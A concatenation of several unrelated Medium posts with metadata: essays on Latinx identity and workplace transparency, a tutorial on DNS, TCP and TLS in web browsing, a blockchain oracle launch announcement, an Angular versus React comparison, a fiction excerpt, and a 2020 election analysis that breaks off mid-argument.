Over the last several years, Latinx, usually pronounced in English or Spanglish (Latin-ex or Lateen-ex) has been used as a gender-neutral or nonbinary alternative to Latino (masculine) and Latina (feminine), which are usually pronounced in Spanish. I fully support the use of Latinx from an inclusive perspective, and quite frankly, I have been shocked to experience queer racism (see Dr. Ibram X. Kendi’s How To Be An Antiracist) on full display from people who make concerted efforts not to use Latinx, even when someone has clarified their pronouns or in a mixed-gender space of Latinx people (Lateen-equis en español). I have heard some people say things like, “I don’t know about Latinx” or “I’m not sure how I feel about Latinx” or “I don’t identify as Latinx” or “I won’t use Latinx” while fully supporting the use of Latino and Latina, making their protests about the X and not about the Latin. In some cases, even going as far as saying that they would use Latin@, which is a way to include Latinos and Latinas, in print, at the same time but still fails to include nonbinary people.
If you are going to refer to someone or a mixed, including nonbinary, group of people as Latin-anything, or you are unsure of anyone’s pronouns, or someone has communicated to you that their pronouns are they, them, and theirs, then I strongly encourage you to refer to them as Latinx instead of Latino or Latina. By no means, am I suggesting that we should all be referred to as Latin-anything; that is for us to decide for ourselves as individuals. But, as my brother Nelson, my primo hermano Rigo, and I have discussed, our issue is not with the “X,” which is more inclusive. Our issue is with the “Latin,” which is Eurocentric and erases our Indigenous identities. I identify as Latino of Mexican Indigenous descent because it allows me to stand in solidarity with all humans who are descendants of the Latin American diaspora.
Closing With An Invitation
I wanted to share some of my own complicated journey, evolution, growth, and overall insights into my experiences through this reflection in hopes that it may inspire more conversations about the exploration of our identities, individually and collectively. !Hasta pronto! | https://medium.com/@drjrod/musings-about-my-identity-5bd4fc4d35a2 | ['Dr. Jesús G. Rodríguez'] | 2021-08-31 03:35:34.800000+00:00 | ['Indigenous', 'Latin America', 'Mexico', 'America', 'Latinos'] |
Radical Transparency | I am a firm believer that transparency is the best approach a company can take to improve its culture.
We are used to hearing about the “Need to know basis”. What if we change this?
What if instead we use “Cannot know basis”. Let me explain.
You will only not be able to know something if you truly cannot know about it.
For example :
Any business deals that cannot be shared before they are done.
Security information that cannot be shared with everyone.
Personal information from employees and/or customers that would invade their privacy.
We should change the paradigm. Instead of just showing the information that you need to do your job (which looks like the other stuff is being hidden away when in reality there is no point in it), we openly say what is being “hidden” and the reason why you cannot access that information.
This eliminates one of the biggest wastes we have in any organization. Office Politics. If anything that can be out in the open is out in the open, then there is no place for office politics. You cannot try to sell politics when everyone can have access to that information and see for themselves.
This quote sums it up
Sunlight is the best disinfectant
Try radical transparency.
Go for “cannot know basis” and see how your culture improves over time.
Till next time … | https://medium.com/@ruitiagoblog/radical-transparency-3d30e2379b96 | ['Rui Costa'] | 2019-10-17 09:09:39.352000+00:00 | ['Transparency', 'Coaching', 'Learning', 'Agile', 'Life'] |
Something Good. | Equal parts magic and tragic, musings from someone who still feels like they’re 12. But definitely are not.
Follow | https://medium.com/mischke-business/something-good-9c32127e204e | ['Anna Mischke'] | 2018-09-10 18:50:02.162000+00:00 | ['Music', 'Inspiration', 'Alt J', 'Personal'] |
How it works: visiting a website from your browser | How it works: visiting a website from your browser
When you type the address of a website into the address bar of a browser, like https://www.holbertonschool.com, there are multiple steps that take place in the background despite you seeing the site within seconds.
Steps 1: URL
The first step, of course, is you put the URL of the website into the address and hit enter which is something you probably do dozens of times a day.
What is URL?
URL stands for Uniform Resource Locator. A URL is nothing more than the address of a given unique resource on the web. A URL is composed of different parts, some mandatory and others optional. Let’s consider this example:
the URL structure shown above has different parts with different purpose, let’s discuss the main ones:
Scheme (protocol) : it tells the web servers which protocol to use when it accesses a resource on Internet. In the example, it is HTTPS (Hypertext Transfer Protocol Secure) — which is the most common scheme currently.
: it tells the web servers which protocol to use when it accesses a resource on Internet. In the example, it is HTTPS (Hypertext Transfer Protocol Secure) — which is the most common scheme currently. Domain name: it indicates which web server is being requested. ‘www.holbertonschool.com’ is the domain in the example. An IP address can be used but it is rare since it is less convenient. We can further divide the domain into parts, as follows:
Subdomain: A subdomain in a URL indicates which particular part of your website the web browser should serve up. Second-level Domain: is the name of the website. It helps people know they’re visiting a certain brand’s site. For instance, people who visit “holbertonschool.com” know they’re on Holberton school’s website, without needing any more information. Top-level Domain: specifies what type of entity your organization registers as on the internet. For example, “.com” is intended for commercial entities and “.edu” is intended for academic institutions.
Port : is a unique number used to access the resources on the web server. It is usually omitted if the web server uses the standard ports ( in the example, it is omitted so it uses the standard port of the HTTPS protocol i.e. 443 for HTTP it is 80).
: is a unique number used to access the resources on the web server. It is usually omitted if the web server uses the standard ports ( in the example, it is omitted so it uses the standard port of the HTTPS protocol i.e. 443 for HTTP it is 80). File path (path): tells your web browser to load a specific page. In the example, ‘/methodology’ is the path. If no path is specified (i.e. only a domain name is entered) then, the browser loads the default page, which usually helps you to navigate to other pages in the website.
the discussion above presents only the fundamental parts of URL . However a URL have additional parts not included in the above discussion For more about URL you can use the reference here.
Step 2: DNS
Computers and other network devices communicate using IP address to identify each other on the internet. URLs are human-friendly and IP addresses are computer-friendly.
So, when you enter the URL, https://www.holbertonschool.com, your request to load that page is sent to DNS servers that look up the domain name of WWW.holbertonschool.com to find its corresponding IP address. Without the IP address, the computer has no clue what it is that you’re after.
What is DNS?
DNS stands for Domain Name System. A DNS is a technology that translates domain names into IP addresses. DNS is the phone-book of the Internet.
How does DNS work?
In order to understand the DNS resolution process, you need to learn about the four DNS servers that are involved in loading a web-page. Your computer is involved the resolution process after the initial request.
1. DNS resolver: is usually your ISP (Internet Service Provider) but it can also be operated by your wireless carrier or a third party provider. The resolver knows which other DNS servers it needs to ask to answer query “What is the IP address of WWW.holbertonschool.com?”. It also keeps IP address cache of frequently requested domain names. All resolver must know one thing: where to locate the root server. The recursor can be thought of as a librarian who is asked to go find a particular book somewhere in a library. It is also called recursive DNS name server.
2. Root name servers: are the first step in the name resolution of any domain name. It can be thought of like and index in a library that points to different racks of books. It servers as reference to other more specific locations. The root server knows where to locate the top-level domains (.com, .net, .org), country code top-level domains (.no, .et, .uk), internationalized top-level domains which are ccTLDs written in the countries’ local characters, infrastructure TLDs and generic TLDs (.HOT, .PIZZA, .APP, …).
3. TLD name servers: The Top Level Domain (TLD) server can be thought as a specific rack of books in a library. It is the last part of the domain name, that is, the label that follows the last dot of a fully qualified domain name. For example, in the domain name WWW.holbertonschool.com, the top-level domain is com. The coordination of most top-level domains (TLDs) belong to the the Internet Corporation for Assigned Names and Numbers (ICANN).
4. Authoritative name server: provides the original and definitive answers to DNS queries. This is where the domain administrator has configured the DNS records for the domain. This final name server can be thought of as a dictionary on a rack of books.
Steps in a DNS lookup
You type the URL, https://www.holbertonschool.com, and hit Enter. First your browser checks if it knows the IP address of the domain by checking in its own cache and OS’ cache. If it doesn’t exist, the OS calls the resolver. When the resolver receives the request, it checks it cache first. If the address of the website is not cached in the resolver’s system, it will need to ask for help from the authoritative DNS hierarchy to get the answer. However, to get to the authoritative server, the resolver sends a request to root name server first. The root server responds to the resolver with the address of the TLD DNS server (in this case .com). The resolver stores this information for future reference. The resolver then sends a request to the TLD server. The TLD server responds with the name and IP address of the domain’s authoritative name servers (which is called Glue records). The resolver stores the address. The figure below shows the authoritative serves of holbertonschool.com and the IP address of on of the servers. The resolver send a query to the name server. The name server responds with the IP address of https://www.holbertonschool.com. The resolver responds to the your OS with the domain’s IP address. The OS provides it to the browser.
Without DNS, you would have to remember lists of IP addresses instead of website names or URL. For more fun and detailed description of the DNS resolution process, check this.
Step 3: Browser sends a connection request to the website
Once your browser gets the IP address of the website, it start to set up a connection. The set up process is accomplished using a three-way handshake (aka SYN-SYN-ACK). This handshake is designed so that two computers that want to communicate information can negotiate the bases of transmission before transmitting data such as the the browser request.
Before talking about the three-way handshake process, lets first discuss the meanings of the messages used to negotiate and start a session.
SYN(Synchronize): Used to initiate and establish a connection. It also helps you to synchronize sequence numbers between devices. ACK(Acknowledgment): Helps to confirm to the other side that it has received the SYN. SYN-ACK(Synchronize-Acknowledgment): SYN message from local device and ACK of the earlier packet. FIN: Used to terminate a connection.
The Three-Way Handshake Process
Step 1: Your browser (the client) establish a connection with the web server. It sends a segment with SYN and informs the server about the client should be its sequence number.
Step 2: In this step server responds to the client request with SYN-ACK signal set. ACK helps you to signify the response of segments that is received and SYN signifies what sequence number it should able to start with the segments.
Step 3: Then your browser responds the web server with an ACK signal to the server, and they both create a stable connection.
Three-way handshake
The sequence number is random and it indicates the beginning of the sequence numbers for data that the sender will transmit.
Step 4: SSL/TLS certificate
After the browser and the server setup stable connection, the browser will first check if the server provide some security. Before we talk about how your browser checks the security, let us talk about SSL/TLS.
What is SSL?
The acronym “SSL” stands for Secure Socket Layer. SSL is standard security technology for creating an encrypted network link between a server and a client, ensuring all data passed is private and secure. TLS stands for Transfer Layer Security.
You may have noticed that certain websites use HTTP and others use HTTPS (which our example use) while exploring the Internet. The difference between the two protocols is an SSL certificate. The ‘S’ in HTTPS stands for security. The communication between your computer and the web server of an HTTPS enabled website is encrypted with an SSL certificate.
Why is SSL needed? SSL/TLS is a protocol used by applications to communicate securely across a network, preventing tampering with and eavesdropping on email, web browsing, messaging, and other protocols. Any information transmitted between a client and a server is protected by an SSL certificate. Encryption is used to do so.
Now, let us talk about how your browser checks for security. The browser downloads the web server’s certificate, which contains the public key of the web server. This certificate is signed with the private key of a trusted certificate authority. The public keys of the major certificate authorities come preinstalled in your browser. Your browser uses this public key to verify that the web server’s certificate was indeed signed by the trusted certificate authority.
After your browser verified and authenticated the server, you browser will use the public key to generate a shared symmetric key which will be used to encrypt the the traffic in this connection. The generated key will be encrypted with the public key of the web server then sent back to the web server. This ensures that only the server decrypt the key since it has the private key.
Step 5: Browser downloads website data
Next, your browser sends a request to the website asking to download its data. This contains some additional information about what browser you’re using and the purpose of the connection.
The server receives this request, and then generates a response in a particular format. It sends this response back to your browser.
Your browser receives the response, and uses it to render the website you requested.
Step 6: That ‘s it?
Once you’re browser display the website, your browser work might not be done. If you click a link, the steps begin all over again. And if you send some information to the page, it uses that to perform an action. Depending on the website, your browser might have to interact with the server in the background.
When everything comes together
One Last thing…honorable mentions
The following are important components of the web serving and hosting process.
Load Balancer
Websites must server hundreds of thousands, if not millions, of simultaneous requests from users and must return the correct text, images, videos, or application data in fast and reliable manner. To meet this high demand, generally requires adding more servers to distribute the load across multiple servers.
A load balancer sites in front of servers and route client request across all servers capable of responding. It distributes the work-load across multiple individual systems, or group of systems to reduce the amount of load on an individual system. This ensures the reliability, efficiency and availability the service provided by the servers.
Load Balancer
The following are the main functions of of a load balancer:
Distribute requests or network load efficiently across multiple servers
Ensure high availability and reliability by sending requests only to servers that are online
Provide the flexibility of scaling up and scaling down per demand.
A load balancer can be a hardware or a software. For more on load balancing check here.
Firewall
Firewalls are hardware, software, or an implementation of both the filter all traffic coming into and out of a server. SSL/TLS is crucial step in securely transmitting data across the Internet but it does not account for trust worthiness of the source. This where firewalls come in and utilize a combination of packet filters, applications gateways, circuit-level gateways and proxy servers to make certain that packets does not contain malicious content.
Database
A database is a collection of information that is organized so that it can be easily accessed, managed and updated. Most modern websites have complicated operations on data or present dynamic data. This operations should be handled by a separate database. The database is typically implemented in separate server. The database stores and retrieves data, manages updates, provides simultaneous access from web servers, providing security, ensuring the integrity of data, and data backup. To manage data in the database server Database Management Systems (DBMSs) are used.
Web hosting with Database System
Application server
An application server is a server that is specially designed in a way that can run application. It is a server that hosts applications. Its primary job is to enable interactions between end-user clients and server-side application code — often called business logic — to generate and deliver dynamic content, such as transaction results, decision support, or real-time analytics.
Web server is designed to serve web pages and it is not able to run demanding web applications. But an application server ensures the processing power and memory to run theses demanding web applications. It also provides the environment to run specific applications.
References
https://tecadmin.net/authoritative-non-authoritative-dns-server/
https://www.cloudflare.com/learning/dns/what-is-dns/
https://www.guru99.com/tcp-3-way-handshake.html
https://developer.mozilla.org/en-US/docs/Glossary/TCP_handshake
https://developer.mozilla.org/en-US/docs/Learn/Common_questions/What_is_a_URL
https://howdns.works/
https://blog.hubspot.com/marketing/parts-url
https://themeisle.com/blog/what-is-a-website-url/
https://www.techdim.com/what-is-application-server/
https://phoenixnap.com/blog/web-server-vs-application-server/
https://cheapsslsecurity.com/blog/what-is-ssl-tls-handshake-understand-the-process-in-just-3-minutes/?utm_source=AboutSSL&utm_medium=couponpage&utm_campaign=cheapcouponpage&utm_content=/how-ssl-certificate-work/
https://www.nginx.com/resources/glossary/load-balancing/
https://www.oreilly.com/library/view/web-database-applications/0596005431/ch01.html | https://medium.com/@yosefsamuel11/how-it-works-visiting-a-website-from-your-browser-d54fb9401b75 | [] | 2021-09-12 10:37:35.933000+00:00 | ['Internet', 'DNS', 'Ssl', 'Servers', 'Browsers'] |
Launching the Band Standard Dataset | As Band Protocol continues to rapidly scale our integration and partnerships across the various blockchain platforms and applications, we are proud to announce the official launch of the Band Standard Dataset — an exhaustive reference price dataset with frequent updates and comprehensive, customizable feeds. With expansive support for crypto assets, commodities and foreign exchange rates, the Band Standard Dataset covers a growing set of 100+ price feeds for any decentralized finance protocol to readily-integrate. Join the growing list of DeFi and dApps that are using Band Protocol standard dataset to enhance the security of your smart contracts.
👉 Build using the Band Standard Dataset today!
Price feeds underpin the majority of decentralized finance (DeFi) Protocols that exist today. The notional amount of value secured by DeFi continues to rise at an unprecedented rate, recently surpassing $15B among industry verticals such as lending, derivatives, synthetic assets, decentralized exchange, and stablecoins.
The all too common blockchain ‘oracle problem’ involves the reliability, security, and trustworthiness of third-party oracles and the trustless execution of smart contracts. Nevertheless, it is still habitual for many protocols to use bandaid solutions that come in the form of centralized or internal mechanisms which have the risks of ongoing maintenance costs, single points of failure, low-quality data, and lack of redundancy on both data source and validator layers.
For developers who prioritize performance and scalability, Band Protocol, a decentralized oracle network, has become the long-term solution to secure hundreds of millions of dollars in value locked up in smart contracts as seen in just Mirror Protocol and Fantom alone.
Before we shine a light on the Band Standard Dataset, let’s run through the two main requirements that a cutting-edge DeFi application needs:
Developers Require Comprehensive, Extensible, and Customizable Feeds
The critical aspect we have learned from our conversations with over 90+ projects, it’s that no two protocols’ data requirements are ever the same. However, the majority of the price oracle solutions today are still extremely restrictive with predetermined datasets or unscalable procedures to create a custom oracle including curating and auditing your own set of trusted validators.
In addition to the relatively small number of supported tokens, the popular feeds provided by many oracles are also meant to be a one-size-fits-all solution, with little to no room for customization in parameters such as update time, price deviation, or security.
The lack of token support is especially detrimental to any protocols looking to support relatively newer or less popular tokens including their own. In those cases, they would have to either have to request and wait for the third-party oracle to support the token, or use centralized oracle implementation for different assets — neither of which is desirable due to major risk factors.
DeFi Deserves Frequent and In-Time Updates
Another key pain point that we have identified is that majority of other oracles update very intermittently — this is with the possible exception of the few most used feeds such as BTC and ETH.
This shortcoming is due to the economics of actually pushing the price data on-chain combined with the associated transaction and network fees. While there are often percentage price deviation mechanics in place to aid with keeping the on-chain price updated, this is often unchangeable once the feed is live or requires a full redeployment where validators must be migrated along with underlying decentralized applications.
Introducing The Band Standard Dataset
With all of that in mind, we are thrilled to introduce the Band Standard Dataset. This dataset comprises a number of price feeds aimed at allowing developers to have the greatest diversity and flexibility in the price feed while maintaining the highest data quality and accessibility possible. | https://medium.com/bandprotocol/launching-the-band-standard-dataset-9c8b3fc16f12 | ['Sawit Trisirisatayawong'] | 2020-12-21 10:06:18.117000+00:00 | ['Launch', 'Decentralization', 'Defi', 'Blockchain Development', 'Technology'] |
Angular Vs. React — The Most Definite Comparison between two titans | Angular Vs. React — The Most Definite Comparison between two titans
Five key differences between Angular and React
Introduction
In today’s world Angular and React are two of the most used frameworks for frontend development. The latest versions of both of the technologies Angular 9 and React 16 come under the MIT license (https://www.mit.edu/) which is an open-source license and requires minimum software redistribution. Which means, we don’t need to invest in a huge software setup to use Angular or React in our projects. Even though they are both JavaScript-based platforms there are a few key differences between these two. Let’s explore the differences. Shall we?
1. Basic Architecture — Framework Vs. Library
Angular is a complete framework, developed using TypeScript and HTML. Whereas React is a JavaScript library and the development uses JavaScript and JSX. Having said that, React does support Typescript as well, but it’s not easy to find the documentation or references in Typescript as opposed to Angular. Angular can also be developed in JavaScript but that’s not widely used. If a developer is more comfortable in JavaScript than TypeScript then it’s better to choose some other platform, React for instance.
Angular is a complete toolkit to create applications. It provides solutions to routing, accessing data services, templating etc. It provides lots of consistency in developing an application including how to structure the projects. But there are some downsides to this structure, i.e. including new classic JavaScript libraries, take some time to set up to work properly with TypeScript and sometimes need to be wrapped within some kind of Angular service to work with Angular components.
As React is a library, it doesn’t have all the components to build a complete application. There are a lot of React libraries that take care of routing, templating etc. Tools like Create React App already include a lot of React libraries, to be used for different features. Besides, it’s easy to add additional libraries without much setup or complexity. The disadvantage for this is a lack of consistency. One can use different libraries/tools to achieve the same functionality. So, for a team, it’s important to decide on which libraries to use.
2. Performance — Real DOM vs. Virtual DOM
React and Angular both rely on DOM or document object model. DOM represents a document as nodes and objects. It’s the object-oriented representation of a webpage.
Angular works on the real DOM, so any small change updates the entire tree structure.
React works with the virtual dom. The Virtual DOM is a lightweight snapshot of the real dom. When anything changes, the entire virtual DOM is updated, but it’s superfast.
When it comes to updating the real DOM, react compares the virtual DOM with the real DOM and only updates the part that has changed. This process is called diffing.
This provides some speed / performance advantage to React over Angular for big, complex and dynamic applications as we are not updating the entire DOM structure, every time something has changed.
3. Data Binding — Two-way vs. One way
Angular uses two-way data binding. Event binding to bind events with methods and property data binding to pass data from the component class and set data of an element at the users end. It takes care of the element properties as well.
React on the other hand is based on a single point of truth, which is its state. Here the UI element can only be changed after changing the model state. A state can only be changed by the “setState” method and the UI is always re-rendered on state change. Since the data flow is one-directional, here we have more control and consistency.
4. Code Structure — Design and logic separation vs. All in one place.
In Angular, the design and the logic are separated in HTML and TypeScript. Even though the binding syntax takes some time to get used to, but the code separation makes it easy to structure the application. It can be quite complex at times when it comes to learning Angular.
In React we have logic, and design in one place. The learning curve for Angular is quite steep as compared to React. But if you are used to Angular, you might not like the code structure in react, which takes away the benefit of being easy to grasp from React.
5. Developer and Popular Uses — Google vs. Facebook
Angular is developed and maintained by Google. It’s used in several Google applications, such as Firebase Console, Google Analytics, Google Express etc. and Forbes, Upwork etc. outside Google
React is developed and maintained by Facebook. It’s used by Facebook, Instagram, WhatsApp etc. And Airbnb, Uber, Netflix, Dropbox etc. outside FB. | https://medium.com/medialesson/angular-vs-react-the-most-definite-comparison-between-two-titans-1d95d89e3f6 | ['Rituparna Goswami Mishra'] | 2020-09-04 19:06:00.090000+00:00 | ['JavaScript', 'Angular', 'Typescript', 'Web Development', 'React'] |
The Men Who Bought Saturday | The Men Who Bought Saturday
The high life comes at a high price
Image courtesy of the author
AS MATT PLACED THE GLASS OF ORANGE JUICE IN FRONT OF HER, he said, “You need to stay here today.” He was drinking out of an espresso cup with a thin gold band around the rim, holding it daintily above her head. She could smell his aftershave, the prep-school essence of synthetic roses and a splash of lavender. It was the smell of soft hands that picked up nothing other than the cheque at a restaurant. The sunshine reflected dully off his immaculate white shirt as he sat opposite her and needlessly adjusted his cufflinks. He wanted to draw attention to them, how heavy they looked. How expensive.
“And do what?” she asked, “count your shoes?”
He took another clean sip from the espresso cup. “Stay out of trouble,” Matt suggested.
His voice signposted the class of company he kept, the kind of muted executive swagger one collects when ascending multiple wage brackets. He was still undoubtedly Australian, but an educated one: he pronounced his t’s as t’s and didn’t slice off the ends of his words. It was war-ter not waw-dah, and it was going and not goin’.
Hannah hated how money had changed him so obviously. He sounded ridiculous.
She slapped her hand on the glass table. “Matt, it’s a Saturday! I need to go out and do something, you can’t just keep me stuck in here. It’s ten am, for fuck sake! What could I do to get myself in trouble at ten in the morning?”
Matt raised his eyebrows as if to say, You’ll think of something. Of course he didn’t say this, and smoothly redirected conversation: “I’ve got a meeting today at eleven. You aren’t needed for any of it, but I do need you to stay here. That would make things a lot easier for me and I’d be done by three, anyway, so just watch Foxtel or something. God forbid, read a book.”
For a moment Hannah wanted to throw the glass at his face, watch it explode over his glossy expensive skin. Blood and orange juice would splatter all over his blue suit, a grand’s worth of tailoring ruined and the potential for permanent facial damage. It was a promising idea, but she thought better of it and instead picked at the sleeve of her — Matt’s — dressing gown.
They both knew what happened when thoughts like these became regrettable, irreversible actions.
“Piss off, smartarse,” she conceded. “I didn’t bring a book with me, and it’s not like you’ve got any good ones here.” Hannah hooked a thumb over her shoulder toward the bookshelf, which was mostly empty. “What, a few John Grishams, the odd Dean Koontz… and a shitload of books about ore mining. Pretty crap library, mate.”
Matt’s eyes narrowed and seemed to darken, a sharp transition from hazel to black that Hannah found disquieting. This repertoire of threatening facial expressions seemed to be something else he had acquired from money, something to earn him kudos in board meetings, perhaps, as the new-money yuppie with something to prove in his Ralph Lauren shirt and Fred Astaire shoes. But Hannah saw through that. His cheeks were still too pink, his brown hair too curly; he was, for all intents and purposes, the same thirteen-year-old boy who caught geckos in lunchboxes on Auntie Gina’s veranda.
“I didn’t ask you here for your opinion,” he said.
“You didn’t ask me to be here at all.”
Matt laid his ankle on his knee and placed his hands on his calf, one smooth motion that suggested it had been performed on repeat occasions. “It doesn’t make things much easier for me, no. I like my own space, so I’d prefer it if you weren’t here. But that’s the way it is.”
He shrugged.
“You always did stay in your room a lot,” Hannah said. “I think you still like living inside your own head, the only difference now that you’ve got a big fuck-off apartment to hide out in.”
“You say that as though all this just fell into my lap.”
“Well with the job you’ve got, yeah, seems that way. You earn more in a year than I reckon I would in four lifetimes, and I really can’t say what exactly the fuck it is you do, Matt.”
He looked into his espresso cup as though a fly were drowning in it. Hannah remembered that he had always been fascinated by small animals in enclosed spaces. She certainly felt like one in this apartment: the floor-to-ceiling windows made it feel like a fish tank.
Matt finally emptied his cup with one quick sip, and as he stood up the steel chair grunted quietly across the wooden floorboards. He checked the time on a small Omega with a blue dial, an ocean on his wrist.
“New watch?” Hannah asked.
“Hm? Oh, I need to upgrade this one, actually. Had for it about a year now.”
She laughed bitterly. “Yeah, Jesus, that’s fuckin’ ancient.”
“Look, is there anything else you want? Some more toast? There are a few eggs left so help yourself.”
She lifted the glass of orange juice and swilled it around. “This’d be better with vodka.”
Matt said nothing and she retorted to his silence by draining the glass.
Matt took his espresso cup and walked to the narrow island of marble planted beside the kitchen table. He placed the cup in the sink and, flicking the tap on, a soft white bolt of water exploded the residual coffee grains out of the bottom. He wiped his hands on a tea towel, even though they weren’t wet.
“Right, I’ll see you later. Give me a call if anything happens.” He grabbed his bag off the kitchen counter, threaded his hands through his jacket. “Bye.”
He closed the door behind him.
And Hannah didn’t know what to do. It was ten am, only ten am, and the day felt vastly unpromising. She had been here two days in this shiny white purgatory, channel-hopping and eating away the hours with Indian takeaways charged to Matt’s credit card. He had given her licence to order whatever she wanted, but every bite was a sour reminder of her dependency on his charity, the shame of it just a further tax upon her bankrupted self-worth.
She decided to have another shower. | https://medium.com/prismnpen/the-men-who-bought-saturday-c206cd9fdfca | ['Liam Heitmann-Ryce'] | 2020-12-26 14:18:53.212000+00:00 | ['Money', 'Class', 'Australia', 'Fiction', 'Storytelling'] |
If You Really Think Trump Is Favored in 2020, You Haven’t Thought It Through | Photo by Darren Halstead on Unsplash
[NOTE: Six months later this story is still being sent around, and virtually everything in it is out of date. A few times I’ve thought about revising it based on new information, but I decided it would be better to leave it as it was originally, so the predictions can be revisited after the election. Keep in mind that it was written before the pandemic, before George Floyd, and everything else that has changed the race since then.]
A recent poll from Monmouth found that two out of three Americans think Trump will win re-election this fall. That poll found, though it didn’t report, that two out of three Americans are wrong.
It does often appear these days that a second Trump term is inevitable, because he can do anything he wants and no one can find a way to make him pay for it. No one can stop him in office, so how can anyone stop him from staying in office? We may be stuck with him until he feels like leaving — which is never, according to him.
All of that is an illusion and a misdirection. What the politicians in Washington do is foolish and pitiable, but more importantly it’s only part of the story. The voters are the only ones who haven’t yet been given an opportunity to stop Trump. But that opportunity is coming soon, and they do intend to exercise it.
If it looks to you like Trump is cruising to victory in November, then either you want it too badly, or you’re too afraid of it to see clearly. Consider this argument:
Trump squeaked out his victory in the Electoral College by the smallest of margins, despite losing the popular vote by a large amount. If he loses any voters from battleground states in 2020, he must make them up somewhere else, or he loses the election. Trump was aided in 2016 by several highly unlikely events which will not be repeated in 2020 … suggesting he will lose voters compared to his first campaign. Trump’s approval ratings have never been higher than when he was elected, suggesting he has lost people who voted for him the first time. Democratic turnout will be higher in 2020 than it was in 2016. Therefore Trump can’t make up the voters he has lost since 2016. Therefore Trump will lose in 2020.
Premise 1 — The Electoral College
I hear the shouts already: “ELECTORAL COLLEGE! ELECTORAL COLLEGE!” And it’s true, I’ve also seen the analyses suggesting that Trump could lose the popular vote by as much as 5% and still win re-election. So this is an objection to the first premise: the claim is that Trump actually could lose voters compared to last time, and still get re-elected.
Fine, let’s do the Electoral College first.
The results of the Electoral College depend on the popular vote in each state. Trump won several states in 2016 by fairly small margins. He won Pennsylvania, Florida, Michigan and Wisconsin by less than 2%. How are those states polling now? [Update: Obviously Trump’s choices are significantly reduced since this was first written, when there were still six viable candidates in the race.]
Michigan: Trump is losing to all of the top five Democratic candidates, generally by significant margins.
Florida: Trump loses to Biden, beats Bloomberg, runs neck-and-neck with Sanders, Warren and Buttigieg.
Pennsylvania: Trump loses to Biden and Sanders, and is maybe slightly behind Warren. For Buttigieg and Bloomberg, there aren’t enough polls.
Wisconsin: Trump loses to Biden and Sanders, beats Buttigieg, and appears to be even with Warren, or slightly behind. Not enough polls for Klobuchar and Bloomberg.
Even if Trump wins every other state he won in 2016, he needs to face either Buttigieg or Klobuchar to have a good chance to win the election. There are other states he could easily lose.
Arizona: Trump won in 2016 by 3.6%. His approval rating is underwater by 1% — a swing of 4.6% toward the Democrats.
Georgia: Trump won it by 5% in 2016, but his approval rating now is even.
Iowa: Trump won it by 9.4% in 2016, but now his approval rating is underwater by 9%.
North Carolina: Trump won it in 2016 by 3.7%, but he’s down by 1% now.
Ohio: Trump won it by 8.1%, but he’s down by 1% now.
These numbers came from a report by The Daily Wire, so the true picture could be even worse for Trump. Obviously, approval numbers are not the same as head-to-head polls — if the eventual Democratic candidate has even lower numbers than Trump in these states, Trump could still win. But the trends suggest that Trump is losing voters in these states, in numbers that could end up flipping the 2016 results.
Looking at the electoral map from 2016, the Democrats have several different plausible ways to flip enough states to win, but Trump has only one way to win. He has to hold onto everything he won by more than 2%, plus at least two of the four toss-up states. A couple of the states Trump needed last time might already be out of reach. The Democrats need 43 more electoral votes than they got in 2016. Florida and Michigan would be enough. Florida and Pennsylvania would be enough. Pennsylvania, Michigan and Wisconsin would be enough. Pennsylvania, Wisconsin and North Carolina would be enough. Arizona, Georgia and Michigan would be enough. Ohio, Georgia and Wisconsin would be enough. Texas and Iowa would be enough.
What’s Trump’s best plan for picking off some Democratic states? New Mexico and Minnesota, where his approval ratings are currently negative by ten points and seven points respectively. New Hampshire? Minus 12. Nevada? Minus 15.
Premise 2 — Lightning Strikes Twice?
Go back to 2016. The presidential election featured the top two least popular major candidates ever. The least popular candidate of all won the contest, due to a staggering number of highly unlikely factors that all fell into place before the end.
Trump faced the least popular major candidate ever, other than himself. His opponent in 2020 will most likely be more popular than Clinton. The leading Democratic candidates are all significantly more popular than Trump at the moment. Two significant third-party candidates ran in 2016. One of them took votes almost exclusively from Hillary Clinton, and one of them took votes from both candidates in roughly equal numbers. Clinton lost support due to a high-profile FBI investigation that ultimately turned up nothing, but kept voters speculating about possible criminal activity up until the weekend before the election. Clinton was damaged by a steady stream of leaked emails that were stolen from her campaign chair by foreign intelligence agents, and released to the media by WikiLeaks. Trump was aided by a long-term influence campaign out of Russia, which spread false information and propaganda aimed at discouraging Democratic voters and motivating conservative turnout. Conservative turnout generally stayed level with 2012, but Democratic turnout was much lower, because most of the country believed Clinton would win easily. But overall the turnout was the lowest for any presidential election in 20 years. Clinton ran an extraordinarily complacent campaign jammed with astonishingly foolish decisions, the worst of which was to stay away from Wisconsin entirely, while Trump visited the state multiple times. Clinton left the campaign trail completely in August for about two weeks, during a time when Trump was doing multiple events every day. Trump was on course to lose big in 2016 until he hired Steve Bannon. Bannon turned the entire campaign around and delivered the victory.
None of these things is likely to happen again in 2020. The Russians will spread lies, for sure. The misinformation will be more pervasive than last time. But who will fall for it? We already know what they’re doing. If anything, Russian interference will turn off moderate voters who might still be on the fence.
Trump won’t have Steve Bannon in charge of his campaign. This time he has Brad Parscale, who used to make websites for a living.
Whoever the Democratic candidate turns out to be, we won’t have a replay of Clinton’s hapless campaign. The Democrat will campaign hard in every battleground state, and Trump is already behind in most of them.
Will Trump try to steal someone’s emails? Probably, but he probably won’t succeed. Everyone saw what happened the last time, and they know how to prevent it. Trump could order an FBI investigation into his eventual opponent, and he might actually get it. But it would most likely end up costing him votes. People would see it as a brazenly autocratic attempt to re-create the magic of 2016, and another reason to get Trump out of office while we have the chance.
As far as we know, no one is preparing an independent run in 2020, and at this point it’s too late to build a campaign on the level of what Jill Stein or Gary Johnson had in 2016. There won’t be a third-party candidate siphoning votes from the Democrat.
Polls for the past year or so have been indicating high turnouts on both sides for 2020. But turnout was already high among Trump’s base in 2016. He doesn’t have a lot of room for improvement. On the other hand, the Democrats will improve considerably over 2016, as the 2018 midterms proved. And the indications are that Trump has continued to lose support among suburban voters across the country.
Trump’s plan is to turn out his base, in even higher numbers than in 2016. He might do it. But it will be like squeezing the last drops of water out of a damp towel. He already turned out his base once, and he needed every vote he could get. Meanwhile there are millions of Democratic voters who did not vote in 2016, but will be highly motivated to come out this year. They’ve had four years to blame themselves for losing.
As an added bonus for the Democrat, Generation Z is now four years older than in 2016, and some of them are now voting. In 2016 the turnout among younger voters was lower than it should have been, probably because they all wanted Bernie Sanders and he didn’t get the nomination. In 2020 it’s looking to be significantly higher. [Update: After Super Tuesday, the young voter turnout is looking a lot less reliable.] And in the 2018 midterms, Democratic congressional candidates won 67% of the vote from people between 18 and 29 years old.
Premise 3 — Has Trump Gained Support?
